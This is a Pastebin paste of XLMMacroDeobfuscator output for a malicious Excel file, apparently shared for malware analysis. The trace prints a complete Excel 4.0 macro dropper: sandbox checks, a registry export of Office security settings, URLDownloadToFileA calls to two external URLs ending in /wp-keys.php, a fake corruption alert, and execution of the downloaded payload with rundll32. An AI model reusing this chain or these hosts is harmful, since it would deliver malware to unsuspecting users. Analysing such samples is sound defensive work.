Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v 0.1.4) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\323455169b75e4a753eb5ad34290243ede09f9d559545aac6e6a71c2719b98de.xls
- [Loading Cells]
- auto_open: auto_open->Sheet2!$FA$7876
- [Starting Deobfuscation]
- CELL:FA7876 , FullEvaluation , SET.VALUE(BJ25299,255.6)
- CELL:FA7877 , FullEvaluation , GOTO(BQ45566)
- CELL:BQ45566 , FullEvaluation , SET.VALUE(CD53037,-389)
- CELL:BQ45567 , FullEvaluation , RUN(Sheet2!HD64832)
- CELL:HD64832 , FullEvaluation , SET.VALUE(FZ5258,65.25)
- CELL:HD64833 , FullEvaluation , RUN(Sheet2!ES3436)
- CELL:ES3436 , FullEvaluation , SET.VALUE(AE45948,-251)
- CELL:ES3437 , FullEvaluation , GOTO(GS20666)
- CELL:GS20666 , FullEvaluation , SET.VALUE(CR53465,-199)
- CELL:GS20667 , FullEvaluation , GOTO(DF5689)
- CELL:DF5689 , FullEvaluation , SET.VALUE(R15778,102.75)
- CELL:DF5690 , FullEvaluation , GOTO(DL39613)
- CELL:DL39613 , FullEvaluation , SET.VALUE(GM16462,-969.75)
- CELL:DL39614 , FullEvaluation , GOTO(HM27262)
- CELL:HM27262 , FullEvaluation , SET.VALUE(IN13413,1203.8)
- CELL:HM27263 , FullEvaluation , RUN(Sheet2!IJ30961)
- CELL:IJ30961 , FullEvaluation , SET.VALUE(DG47804,-494)
- CELL:IJ30962 , FullEvaluation , RUN(Sheet2!AL57983)
- CELL:AL57983 , FullEvaluation , SET.VALUE(BG47080,35)
- CELL:AL57984 , FullEvaluation , GOTO(HN49209)
- CELL:HN49209 , FullEvaluation , FORMULA("=CLOSE(FALSE)",FE5114)
- CELL:HN49210 , FullEvaluation , RUN(Sheet2!EG28967)
- CELL:EG28967 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",EG28968)
- CELL:EG28968 , PartialEvaluation , APP.MAXIMIZE()
- CELL:EG28969 , FullEvaluation , RUN(Sheet2!DT45019)
- CELL:DT45019 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R[-39906]C[37]),)",DT45020)
- CELL:DT45020 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R[-39906]C[37]),)
- CELL:DT45021 , FullEvaluation , GOTO(U26012)
- CELL:U26012 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-20899]C[140]))",U26013)
- CELL:U26013 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-20899]C[140]))
- CELL:U26014 , FullEvaluation , RUN(Sheet2!IO19668)
- CELL:IO19668 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[-14555]C[-88]),)",IO19669)
- CELL:IO19669 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[-14555]C[-88]),)
- CELL:IO19670 , FullEvaluation , GOTO(FG59760)
- CELL:FG59760 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[-54647]C[-2]),)",FG59761)
- CELL:FG59761 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[-54647]C[-2]),)
- CELL:FG59762 , FullEvaluation , RUN(Sheet2!HC57286)
- CELL:HC57286 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[-52173]C[-50]),)",HC57287)
- CELL:HC57287 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R[-52173]C[-50]),)
- CELL:HC57288 , FullEvaluation , RUN(Sheet2!FG13805)
- CELL:FG13805 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[-8692]C[-2]),)",FG13806)
- CELL:FG13806 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R[-8692]C[-2]),)
- CELL:FG13807 , FullEvaluation , GOTO(HS5509)
- CELL:HS5509 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[-396]C[-66]))",HS5510)
- CELL:HS5510 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-396]C[-66]))
- CELL:HS5511 , FullEvaluation , RUN(Sheet2!AQ38016)
- CELL:AQ38016 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[-32903]C[118]))",AQ38017)
- CELL:AQ38017 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-32903]C[118]))
- CELL:AQ38018 , FullEvaluation , GOTO(CR63589)
- CELL:CR63589 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-58476]C[65]))",CR63590)
- CELL:CR63590 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-58476]C[65]))
- CELL:CR63590 , FullEvaluation , [TRUE]
- CELL:CR63591 , FullEvaluation , RUN(Sheet2!DR7029)
- CELL:DR7029 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",FG17853)
- CELL:DR7030 , FullEvaluation , GOTO(GU6960)
- CELL:GU6960 , FullEvaluation , FORMULA("=""C:\Users\Public\WMNyoI.reg""",AK62260)
- CELL:GU6961 , FullEvaluation , RUN(Sheet2!EF33676)
- CELL:EF33676 , FullEvaluation , FORMULA("=R[-33458]C[47]&GET.WORKSPACE(2)&""\Excel\Security ""&R[10949]C[-79]&"" /y""",DL51311)
- CELL:EF33677 , FullEvaluation , RUN(Sheet2!FX41133)
- CELL:FX41133 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",AZ24506)
- CELL:FX41134 , FullEvaluation , RUN(Sheet2!HN11697)
- CELL:HN11697 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[12808]C[-170],R[39613]C[-106],0,5)",HN11698)
- CELL:HN11698 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","=""C:\Windows\system32\reg.exe""","=R[-33458]C[47]&GET.WORKSPACE(2)&""\Excel\Security ""&R[10949]C[-79]&"" /y""",0,5)
- CELL:HN11699 , FullEvaluation , GOTO(FZ14642)
- CELL:FZ14642 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[47615]C[-145])))",FZ14645)
- CELL:FZ14643 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",FZ14646)
- CELL:FZ14644 , FullEvaluation , FORMULA("=NEXT()",FZ14647)
- CELL:FZ14645 , PartialEvaluation , WHILE(ISERROR(FILES(R[47615]C[-145])))
- CELL:FZ14648 , FullEvaluation , GOTO(CA23395)
- CELL:CA23395 , FullEvaluation , FORMULA("=FOPEN(R[38864]C[-42])",CA23396)
- CELL:CA23396 , PartialEvaluation , FOPEN("=""C:\Users\Public\WMNyoI.reg""")
- CELL:CA23397 , FullEvaluation , GOTO(GX30764)
- CELL:GX30764 , FullEvaluation , FORMULA("=FPOS(R[-7369]C[-127],215)",GX30765)
- CELL:GX30765 , PartialEvaluation , FPOS("FOPEN(""=""""C:\Users\Public\WMNyoI.reg"""""")",215)
- CELL:GX30766 , FullEvaluation , RUN(Sheet2!DY20468)
- CELL:DY20468 , FullEvaluation , FORMULA("=FREAD(R[2927]C[-50],255)",DY20469)
- CELL:DY20469 , PartialEvaluation , FREAD("FOPEN(""=""""C:\Users\Public\WMNyoI.reg"""""")",255)
- CELL:DY20470 , FullEvaluation , RUN(Sheet2!EJ44420)
- CELL:EJ44420 , FullEvaluation , FORMULA("=FCLOSE(R[-21025]C[-61])",EJ44421)
- CELL:EJ44421 , PartialEvaluation , FCLOSE("FOPEN(""=""""C:\Users\Public\WMNyoI.reg"""""")")
- CELL:EJ44422 , FullEvaluation , RUN(Sheet2!DE35862)
- CELL:DE35862 , FullEvaluation , FORMULA("=FILE.DELETE(R[26397]C[-72])",DE35863)
- CELL:DE35863 , PartialEvaluation , FILE.DELETE("=""C:\Users\Public\WMNyoI.reg""")
- CELL:DE35864 , FullEvaluation , RUN(Sheet2!EW6206)
- CELL:EW6206 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[14262]C[-24])),GOTO(R[-1093]C[8]),)",EW6207)
- CELL:EW6207 , FullBranching , IF(ISNUMBER(SEARCH("0001",R[14262]C[-24])),GOTO(R[-1093]C[8]),)
- CELL:EW6207 , FullEvaluation , [TRUE] GOTO(R[-1093]C[8])
- CELL:FE5114 , End , CLOSE(FALSE)
- CELL:EW6207 , FullEvaluation , [FALSE]
- CELL:EW6208 , FullEvaluation , RUN(Sheet2!HG37600)
- CELL:HG37600 , FullEvaluation , FORMULA("=""C:\Users\Public\CcWcaZEP.html""",AG4058)
- CELL:HG37601 , FullEvaluation , GOTO(BG7958)
- CELL:BG7958 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",GK20094)
- CELL:BG7959 , FullEvaluation , GOTO(FT2763)
- CELL:FT2763 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[17330]C[17],R[1294]C[-143],0,0)",FT2764)
- CELL:FT2764 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""","=""C:\Users\Public\CcWcaZEP.html""",0,0)
- CELL:FT2765 , FullEvaluation , GOTO(GS14934)
- CELL:GS14934 , FullEvaluation , FORMULA("=FILES(R[-10877]C[-168])",GS14935)
- CELL:GS14935 , PartialEvaluation , FILES("=""C:\Users\Public\CcWcaZEP.html""")
- CELL:GS14936 , FullEvaluation , RUN(Sheet2!IB64512)
- CELL:IB64512 , FullEvaluation , FORMULA("=IF(ISERROR(R[-49578]C[-35]),GOTO(R[-59399]C[-75]),)",IB64513)
- CELL:IB64513 , FullBranching , IF(ISERROR(R[-49578]C[-35]),GOTO(R[-59399]C[-75]),)
- CELL:IB64513 , FullEvaluation , [TRUE] GOTO(R[-59399]C[-75])
- CELL:FE5114 , End , CLOSE(FALSE)
- CELL:IB64513 , FullEvaluation , [FALSE]
- CELL:IB64514 , FullEvaluation , GOTO(FW47055)
- CELL:FW47055 , FullEvaluation , SET.VALUE(IU65323,-97.5)
- CELL:FW47056 , FullEvaluation , GOTO(GT51876)
- CELL:GT51876 , FullEvaluation , SET.VALUE(BH45074,247)
- CELL:GT51877 , FullEvaluation , GOTO(AY22925)
- CELL:AY22925 , FullEvaluation , SET.VALUE(GC44684,329)
- CELL:AY22926 , FullEvaluation , RUN(Sheet2!EQ17120)
- CELL:EQ17120 , FullEvaluation , SET.VALUE(BZ59600,376)
- CELL:EQ17121 , FullEvaluation , RUN(Sheet2!CI60554)
- CELL:CI60554 , FullEvaluation , SET.VALUE(IJ21467,-846)
- CELL:CI60555 , FullEvaluation , GOTO(CP30159)
- CELL:CP30159 , FullEvaluation , SET.VALUE(AP50057,0.9)
- CELL:CP30160 , FullEvaluation , GOTO(AD49613)
- CELL:AD49613 , FullEvaluation , SET.VALUE(AT21980,-357.6)
- CELL:AD49614 , FullEvaluation , RUN(Sheet2!IG12751)
- CELL:IG12751 , FullEvaluation , SET.VALUE(EO40560,172)
- CELL:IG12752 , FullEvaluation , GOTO(GC38983)
- CELL:GC38983 , FullEvaluation , SET.VALUE(BU61267,476)
- CELL:GC38984 , FullEvaluation , GOTO(DH39742)
- CELL:DH39742 , FullEvaluation , SET.VALUE(HY9156,406)
- CELL:DH39743 , FullEvaluation , GOTO(DN42978)
- CELL:DN42978 , FullEvaluation , FORMULA("=""C:\Users\Public\kf1o.html""",FP15812)
- CELL:DN42979 , FullEvaluation , GOTO(EB3725)
- CELL:EB3725 , FullEvaluation , FORMULA("=""https://dehabadi.ir/wp-keys.php""",EN4797)
- CELL:EB3726 , FullEvaluation , RUN(Sheet2!AX38305)
- CELL:AX38305 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[4751]C[5],R[15766]C[33],0,0)",EI46)
- CELL:AX38306 , FullEvaluation , GOTO(BB30)
- CELL:BB30 , FullEvaluation , FORMULA("=FILES(R[-34907]C[50])",DR50719)
- CELL:BB31 , FullEvaluation , GOTO(CN53095)
- CELL:CN53095 , FullEvaluation , FORMULA("=IF(ISERROR(R[16690]C[104]),,RUN(R[-31106]C[26]))",R34029)
- CELL:CN53096 , FullEvaluation , GOTO(HD9075)
- CELL:HD9075 , FullEvaluation , FORMULA("=""https://eleventalents.com/wp-keys.php""",AB61478)
- CELL:HD9076 , FullEvaluation , RUN(Sheet2!GE52633)
- CELL:GE52633 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[8035]C[-199],R[-37631]C[-55],0,0)",HS53443)
- CELL:GE52634 , FullEvaluation , RUN(Sheet2!E6760)
- CELL:E6760 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",DD49036)
- CELL:E6761 , FullEvaluation , GOTO(DK19379)
- CELL:DK19379 , FullEvaluation , FORMULA("=ALERT(R[46113]C[64])",AR2923)
- CELL:DK19380 , FullEvaluation , RUN(Sheet2!GR22181)
- CELL:GR22181 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",DU54329)
- CELL:GR22182 , FullEvaluation , GOTO(GZ25335)
- CELL:GZ25335 , FullEvaluation , FORMULA("=R[-29869]C[-79]&"",DllRegisterServer""",IQ45681)
- CELL:GZ25336 , FullEvaluation , GOTO(AI4480)
- CELL:AI4480 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[50025]C[-13],R[41377]C[113],0,5)",EH4304)
- CELL:AI4481 , FullEvaluation , GOTO(EI46)
- CELL:EI46 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"=""https://dehabadi.ir/wp-keys.php""","=""C:\Users\Public\kf1o.html""",0,0)
- CELL:EI47 , FullEvaluation , RUN(Sheet2!DR50719)
- CELL:DR50719 , PartialEvaluation , FILES("=""C:\Users\Public\kf1o.html""")
- CELL:DR50720 , FullEvaluation , GOTO(R34029)
- CELL:R34029 , FullBranching , IF(ISERROR(R[16690]C[104]),,RUN(R[-31106]C[26]))
- CELL:R34029 , FullEvaluation , [TRUE]
- CELL:R34030 , FullEvaluation , GOTO(AB61478)
- CELL:AB61478 , FullEvaluation , "https://eleventalents.com/wp-keys.php"
- CELL:AB61479 , FullEvaluation , RUN(Sheet2!HS53443)
- CELL:HS53443 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://eleventalents.com/wp-keys.php","=""C:\Users\Public\kf1o.html""",0,0)
- CELL:HS53444 , FullEvaluation , RUN(Sheet2!DD49036)
- CELL:DD49036 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:DD49037 , FullEvaluation , GOTO(AR2923)
- CELL:AR2923 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:AR2924 , FullEvaluation , GOTO(DU54329)
- CELL:DU54329 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:DU54330 , FullEvaluation , GOTO(IQ45681)
- CELL:IQ45681 , FullEvaluation , "=""C:\Users\Public\kf1o.html"",DllRegisterServer"
- CELL:IQ45682 , FullEvaluation , GOTO(EH4304)
- CELL:EH4304 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","=""C:\Users\Public\kf1o.html"",DllRegisterServer",0,5)
- CELL:EH4305 , FullEvaluation , GOTO(FE5114)
- CELL:FE5114 , End , CLOSE(FALSE)
- CELL:R34029 , FullEvaluation , [FALSE] RUN(Sheet2!AR2923)
- CELL:AR2923 , PartialEvaluation , ALERT("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""")
- CELL:AR2924 , FullEvaluation , GOTO(DU54329)
- CELL:DU54329 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:DU54330 , FullEvaluation , GOTO(IQ45681)
- CELL:IQ45681 , FullEvaluation , "=""C:\Users\Public\kf1o.html"",DllRegisterServer"
- CELL:IQ45682 , FullEvaluation , GOTO(EH4304)
- CELL:EH4304 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","=""C:\Users\Public\kf1o.html"",DllRegisterServer",0,5)
- CELL:EH4305 , FullEvaluation , GOTO(FE5114)
- CELL:FE5114 , End , CLOSE(FALSE)
- CELL:CR63590 , FullEvaluation , [FALSE] GOTO(R[-58476]C[65])
- CELL:FE5114 , End , CLOSE(FALSE)
- [END of Deobfuscation]
- time elapsed: 9.589247465133667
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement